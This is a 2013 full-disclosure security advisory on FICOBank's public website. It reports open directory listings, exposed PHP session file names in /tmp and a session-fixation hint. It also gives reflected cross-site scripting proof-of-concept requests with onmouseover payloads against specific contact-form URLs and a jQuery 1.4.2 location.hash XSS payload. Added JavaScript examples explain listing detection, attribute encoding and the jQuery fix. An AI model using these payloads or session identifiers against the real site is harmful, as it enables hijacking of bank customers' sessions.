FICOBank Information Disclosure / Cross Site Scripting

2013.08.24
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

FICOBank Directory Listing Information Disclosure / Cross Site Scripting / Jquery Old Version Vulnerable

Report-Timeline:
================
23-08-2013 Advisory Response: "Our country does not have the same laws as their own and we do not consider to be security flaws the data you send us. Thank you very much"
( /ME I don't understand this response.. Is it a joke? )
20-08-2013 Full Disclosure

I-VULNERABILITY
-------------------------
#Title: FICOBank Directory Listing Information Disclosure / Cross Site Scripting / Jquery Old Version Vulnerable
#Vendor: http://www.ficobank.com / http://ficobank.com
#Author: Juan Carlos García (@secnight)
#Follow me: http://www.highsec.es  Twitter: @secnight

II-Introduction:
=============
The First Isabela Cooperative Bank (FICOBank) is one of the pioneer and most prominent cooperative banks in the Philippines. Its origin is deeply rooted in the community: it was organized 36 years ago by two cooperatives and 47 samahang nayons, representing farmers who had limited resources and little access to banking services. From the molehill-sized cooperative rural bank it opted to be, it grew into a mountain-high cooperative bank, and can now lay claim to a resource base of over Php 2.37 billion (as of December 31, 2012).
-------------------------

III-PROOF OF CONCEPT
====================

Attack details
--------------

Directory Listing
*****************
The web server is configured to display the list of files contained in these directories. This is not recommended, because a directory may contain files that are never linked from the site. A user can view the complete file list of each directory, possibly exposing sensitive information. Note that the listings below include many _notes folders; Adobe Dreamweaver creates these to hold "Design Notes" metadata about the site's pages, so they point to a site published straight from the authoring tool. Listing is switched off on Apache with "Options -Indexes" and on nginx with "autoindex off;".
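As an added check (not part of the advisory), the function below classifies a fetched response body as an auto-generated directory listing and flags the entry names a reviewer would escalate on: _notes folders, .bak copies, PHP session files, logs and dumps. The marker and name patterns are my own heuristics for Apache and nginx autoindex output, and the sample body is constructed to resemble what /tmp/ would look like with listing enabled; it is not a capture from ficobank.com.

```javascript
// Added example, not from the advisory: detect an autoindex page and flag
// sensitive entry names. Heuristics and sample body are constructed.

// Markers that Apache mod_autoindex and nginx autoindex pages carry.
const LISTING_MARKERS = [
  /<title>\s*Index of \//i,   // both servers use this title
  /<h1>\s*Index of \//i,
  /<a href="\.\.\/">/i,       // "Parent Directory" link
];

// Entry names worth escalating on, each paired with the reason.
const SENSITIVE = [
  [/^_notes\/?$/i,            'Dreamweaver design-notes folder (authoring metadata)'],
  [/\.(bak|old|orig|swp)$/i,  'backup or editor copy, may be served as plain text'],
  [/^sess_[\w,-]+$/i,         'PHP session file: leaks a live session id'],
  [/\.log$/i,                 'log file'],
  [/\.(sql|zip|tar|gz)$/i,    'database dump or archive'],
];

// Require two independent markers so a page that merely contains the phrase
// "Index of /" in prose is not reported.
function isDirectoryListing(body) {
  return LISTING_MARKERS.filter((re) => re.test(body)).length >= 2;
}

// Collect the relative names from the listing; the sort links ("?C=N;O=D"),
// the parent link and absolute URLs are not entries.
function listingEntries(body) {
  const entries = [];
  const re = /<a\s+href="([^"]+)"/gi;
  let m;
  while ((m = re.exec(body)) !== null) {
    const href = m[1];
    if (href === '../' || href.startsWith('?') || /^[a-z]+:\/\//i.test(href)) continue;
    entries.push(href);
  }
  return entries;
}

function flagSensitive(entries) {
  const hits = [];
  for (const entry of entries) {
    for (const [re, why] of SENSITIVE) {
      if (re.test(entry)) { hits.push({ entry, why }); break; }
    }
  }
  return hits;
}

function auditListing(body) {
  if (!isDirectoryListing(body)) return { listing: false, entries: [], sensitive: [] };
  const entries = listingEntries(body);
  return { listing: true, entries, sensitive: flagSensitive(entries) };
}

// Constructed sample: an Apache-style listing of /tmp/ (not a real capture).
const SAMPLE_TMP = `<html><head><title>Index of /tmp</title></head><body>
<h1>Index of /tmp</h1><pre>
<a href="?C=N;O=D">Name</a>
<a href="../">Parent Directory</a>
<a href="mailError.log">mailError.log</a>
<a href="sess_b35e89c88df72a4c589a5a8e1a495594">sess_b35e89c88df72a4c589a5a8e1a495594</a>
<a href="untitled">untitled</a>
</pre></body></html>`;

// Constructed sample: an ordinary page that must not be flagged.
const SAMPLE_PLAIN = '<html><body><p>Index of / services we offer</p></body></html>';

console.log(JSON.stringify(auditListing(SAMPLE_TMP), null, 2));
console.log('plain page flagged:', auditListing(SAMPLE_PLAIN).listing); // false
```

Feed it the body of each directory URL from the affected-items list; for a real engagement the verdict to record is the presence of the listing plus the flagged names, not the file contents.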
Affected items
http://ficobank.com/annualreport/
/annualreport
/annualreport/_notes
/annualreport/annualreport
/Assets4Sale
/Assets4Sale/a4sale
/Assets4Sale/a4sale/_notes
/contact
/contact/_notes
/contact/html-contact-form-captcha
/contact/html-contact-form-captcha/_notes
/contact/html-contact-form-captcha/scripts
/contact/html-contact-form-captcha/scripts/_notes
/contact/scripts
/contact/scripts/_notes
/contact/scripts-old
/contact/scripts-old/_notes
/DepositProducts
/DepositProducts/_notes
/Ficonnect
/flash
/flash/_notes
/images
/images/awards
/images/images
/images/jobopening
/images/jobopening/_notes
/images/officer
/images/signature
/images/signature/_notes
/images/slides
/Leadership
/LoanProducts
/news
/news/_notes
/OtherServices
/OtherServices/_notes
/scripts
/scripts/_notes
/Stylesheet
/Stylesheet/_notes

Temporary file/directory
************************
Affected items
http://www.ficobank.com/tmp/
/tmp
/tmp/mailError.log
/tmp/sess_secnightsessionfixation
/tmp/sess_b35e89c88df72a4c589a5a8e1a495594
/tmp/sess_f277f2a2689ac1ee7b04b527b80b9b7c
/tmp/untitled
The sess_* files are PHP session files: anyone who can read this listing obtains live session identifiers, and the file named sess_secnightsessionfixation indicates that the server stores a session under whatever identifier the client supplies instead of issuing its own, which is the precondition for session fixation.

File Lock
*********
Lock files (typically the .lck files Dreamweaver writes when a page is checked out) often contain the username and e-mail address of the user who locked the file, so usernames can be harvested with this technique.
Affected items
http://www.ficobank.com/DepositProducts/

Cross Site Scripting
********************
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to deliver malicious code (usually JavaScript) to another user. Because the browser cannot know whether the script should be trusted, it executes it in the user's context, letting the attacker read any cookies or session tokens the browser holds for the site. Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user and gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.
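The findings that follow all share one pattern: a parameter is reflected inside an attribute value, and the payload closes the quote and starts an event-handler attribute. The block below is an added example, not code from the advisory or from the vendor's site; it models that reflection in a small template (the input tag is an assumption, since contactus.php itself is not on the page), uses the reported payloads, and contrasts the vulnerable echo with a double-quote-only encoder (which only protects the matching quote style) and a proper attribute encoder. A small attribute tokenizer is included so the break-out can be asserted rather than eyeballed.

```javascript
// Added example, not from the advisory: why the reported payloads break out of
// a quoted attribute, and what a correct attribute encoder changes.
// The input tag template is an assumption; the quote character mirrors the
// two contexts reported (single-quoted in contactus.php, double-quoted in the
// email.php PATH_INFO reflection).

// Payloads exactly as reported, URL-decoded.
const PAYLOAD_SQ = "sample@email.tst' onmouseover=prompt(947854) bad='";
const PAYLOAD_DQ = '#" onmouseover=prompt(919235) //';

// Vulnerable: the value is echoed into the attribute verbatim.
function renderVulnerable(value, q = "'") {
  return `<input type="text" name="email" value=${q}${value}${q}>`;
}

// Common half-fix: encode &, <, > and double quotes only. This is what a
// double-quote-only encoder produces (PHP's htmlspecialchars() behaved this
// way with its pre-8.1 default ENT_COMPAT flag). It protects a double-quoted
// attribute and does nothing for a single-quoted one.
function encodeDoubleQuoteOnly(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;')
          .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}
function renderHalfFixed(value, q = "'") {
  return `<input type="text" name="email" value=${q}${encodeDoubleQuoteOnly(value)}${q}>`;
}

// Correct: encode every character that can end an attribute value in either
// quoting style, plus the HTML metacharacters, in a single pass.
function encodeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function renderFixed(value, q = "'") {
  return `<input type="text" name="email" value=${q}${encodeAttr(value)}${q}>`;
}

// Minimal attribute tokenizer for the check: returns the attribute names of
// the first tag. If "onmouseover" appears as an attribute of its own, the
// input has terminated the value attribute and the payload is live.
function attributeNames(markup) {
  const tag = markup.slice(markup.indexOf('<') + 1, markup.indexOf('>'));
  const re = /\s([A-Za-z_:][-A-Za-z0-9_:.]*)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  const names = [];
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

function isBrokenOut(markup) {
  return attributeNames(markup).includes('onmouseover');
}

console.log('vulnerable, single-quoted :', isBrokenOut(renderVulnerable(PAYLOAD_SQ)));      // true
console.log('half-fixed, single-quoted :', isBrokenOut(renderHalfFixed(PAYLOAD_SQ)));       // true
console.log('fixed, single-quoted      :', isBrokenOut(renderFixed(PAYLOAD_SQ)));           // false
console.log('vulnerable, double-quoted :', isBrokenOut(renderVulnerable(PAYLOAD_DQ, '"'))); // true
console.log('half-fixed, double-quoted :', isBrokenOut(renderHalfFixed(PAYLOAD_DQ, '"')));  // false
```

The half-fixed case is the one to remember when reading the two reflection contexts in the findings: an encoder that passes the double-quoted email.php reflection can still fail the single-quoted contactus.php one, so the encoder must cover both quote characters regardless of which one the template happens to use.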
Affected items

/contact/contactus.php
URL encoded POST input email was set to: sample%40email.tst' onmouseover=prompt(947854) bad='
The input is reflected inside a tag parameter between single quotes.
Variant email (2):
POST /contact/contactus.php
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28947854%29%20bad%3d%27&message=20&name=secnight&submit=Submit
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28924627%29%20bad%3d%27&message=20&name=jjxlxmqv&submit=Submit
Variant name:
URL encoded POST input name was set to: secnight' onmouseover=prompt(991722) bad='  and  jjxlxmqv' onmouseover=prompt(991722) bad='
The input is reflected inside a tag parameter between single quotes.
POST /contact/contactus.php
6_letters_code=94102&email=sample%40email.tst&message=20&name=secnight%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit
6_letters_code=94102&email=sample%40email.tst&message=20&name=jjxlxmqv%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit

/contact/email.php
URI was set to: #" onmouseover=prompt(919235) //
The input is reflected inside a tag parameter between double quotes.
GET /contact/email.php/%F6%22%20onmouseover=prompt(919235)%20//

/contact/email.php.bak
URI was set to: #" onmouseover=prompt(994575) //
GET /contact/email.php.bak/%F6%22%20onmouseover=prompt(994575)%20//

/contact/email.php.BAK
URI was set to: #" onmouseover=prompt(924567) //
The input is reflected inside a tag parameter between double quotes.
GET /contact/email.php.BAK/%F6%22%20onmouseover=prompt(924567)%20//

/contact/html-contact-form-captcha/html-contact-form.php (4)
URL encoded POST input email was set to: sample%40email.tst' onmouseover=prompt(913822) bad='
POST /contact/html-contact-form-captcha/html-contact-form.php
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28913822%29%20bad%3d%27&message=20&name=fpfvlamn&submit=Submit

/contact/samplexyz.php (7)
URL encoded POST input contactname was set to: pdnfeddf" onmouseover=prompt(969944) bad="
POST /contact/samplexyz.php
contactname=pdnfeddf%22%20onmouseover%3dprompt%28969944%29%20bad%3d%22&email=sample%40email.tst&subject=1
Variants: contactname, email, subject

/contact/samplexyz.php.bak
URI was set to: #" onmouseover=prompt(959358) //
The input is reflected inside a tag parameter between double quotes.
GET /contact/samplexyz.php.bak/%F6%22%20onmouseover=prompt(959358)%20//

/contact/samplexyz.php.BAK
URI was set to: #" onmouseover=prompt(966989) //
GET /contact/samplexyz.php.BAK/%F6%22%20onmouseover=prompt(966989)%20//

/contactus.php (4)
Variants: email, name
email (3): URL encoded POST input email was set to: sample%40email.tst' onmouseover=prompt(971885) bad='
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28971885%29%20bad%3d%27&message=20&name=bxaskxpx&submit=Submit
name (1): URL encoded POST input name was set to: iwelgyng' onmouseover=prompt(991324) bad='
6_letters_code=94102&email=sample%40email.tst&message=20&name=iwelgyng%27%20onmouseover%3dprompt%28991324%29%20bad%3d%27&submit=Submit

Jquery Old Version Vulnerable
*****************************
jQuery JavaScript Library v1.4.2
This problem was fixed in jQuery 1.6.3. The site is serving an older version of jQuery that is vulnerable to cross site scripting: many sites select elements with $(location.hash), and in this version a fragment that contains an HTML tag is parsed as HTML instead of being treated as a selector, which lets someone inject script into the page. Note that the evidence below only shows the old library being served; exploitation additionally requires a page on the site that passes location.hash (or another attacker-controlled string) into $().
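To make the selector-versus-HTML decision concrete, the block below is an added example (not from the advisory and not the jQuery library itself): it reproduces the "quick expression" that jQuery's $() used to decide whether its argument is HTML, an id, or a selector, in the form it had in 1.4.2 and in the form that 1.6.3 introduced, and classifies the advisory's fragment payload under each. The two regular expressions are written from memory of the jQuery source and should be checked against the actual releases before being relied on; the safe-hash helper at the end is my own suggestion for code that wants to keep using the fragment.

```javascript
// Added example, not from the advisory or from jQuery: the $() argument
// classifier in the shape it had before and after the 1.6.3 fix. Both
// patterns are reproduced from memory of the jQuery source (assumption).

// jQuery 1.4.2: any string containing <...> is HTML, even one beginning with '#'.
const QUICK_EXPR_1_4_2 = /^(?:[^<]*(<[\w\W]+>)[^>]*$|#([\w\-]+)$)/;
// jQuery 1.6.3: HTML only if no '#' precedes the first '<'.
const QUICK_EXPR_1_6_3 = /^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/;

// Mirrors the branch in jQuery.fn.init: capture group 1 set => parse as HTML
// and create elements; group 2 set => getElementById; otherwise run a
// selector engine query.
function classify(input, quickExpr) {
  const m = quickExpr.exec(input);
  if (m && m[1]) return 'html';
  if (m && m[2]) return 'id';
  return 'selector';
}

// The fragment the advisory appended to the URL.
const HASH_PAYLOAD = '#<img src=/ onerror=alert(1)>';

// Safe pattern for pages that want $(location.hash): accept only a plain id
// and look it up directly, so no string ever reaches the HTML parser.
function safeHashTarget(hash) {
  const m = /^#([\w-]+)$/.exec(hash);
  return m ? m[1] : null;
}

for (const input of ['#id', '<img>', '#<img>', HASH_PAYLOAD, 'div.fade']) {
  console.log(JSON.stringify(input),
    '1.4.2 =>', classify(input, QUICK_EXPR_1_4_2),
    '1.6.3 =>', classify(input, QUICK_EXPR_1_6_3));
}
console.log('safeHashTarget(payload):', safeHashTarget(HASH_PAYLOAD)); // null
```

Under the 1.4.2 pattern the payload is classified as HTML, so $(location.hash) would create the img element and fire its onerror handler; under the 1.6.3 pattern the leading '#' blocks the HTML branch and the string falls through to the selector engine, which rejects it. Upgrading the library is the fix; the safeHashTarget helper is the belt-and-braces option for code that must keep reading the fragment.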
In short: $("#id") is a CSS selector, $("<img>") is createElement, and $("#<img>") is createElement too.

Affected items

/OtherServices/fade.min.js
GET /OtherServices/fade.min.js
Response:
HTTP/1.1 200 OK
Date: Fri, 23 Aug 2013 15:48:45 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 13 Dec 2011 07:09:36 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Age: 0
Connection: keep-alive
Server: YTS/1.20.28

/OtherServices/jquery.fade.js
GET /OtherServices/jquery.fade.js jquery_xss/#<img src=/ onerror=alert(1)>
Response:
HTTP/1.1 200 OK
Date: Fri, 23 Aug 2013 15:48:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 13 Dec 2011 07:09:52 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Age: 0
Connection: keep-alive
Server: YTS/1.20.28
Content-Length: 72174

/scripts/fade.min.js
GET /scripts/fade.min.js
Response:
HTTP/1.1 200 OK
Date: Fri, 23 Aug 2013 15:48:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 11 Jul 2013 03:44:10 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Age: 0
Connection: keep-alive
Server: YTS/1.20.28
Content-Length: 72174

/scripts/jquery.fade.js
GET /scripts/jquery.fade.js
Response: the same.

IV. CREDITS
-------------------------
This vulnerability has been discovered by Juan Carlos García (@secnight)
Special Thanks: Perseo V.
LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage caused by the use or misuse of this information.

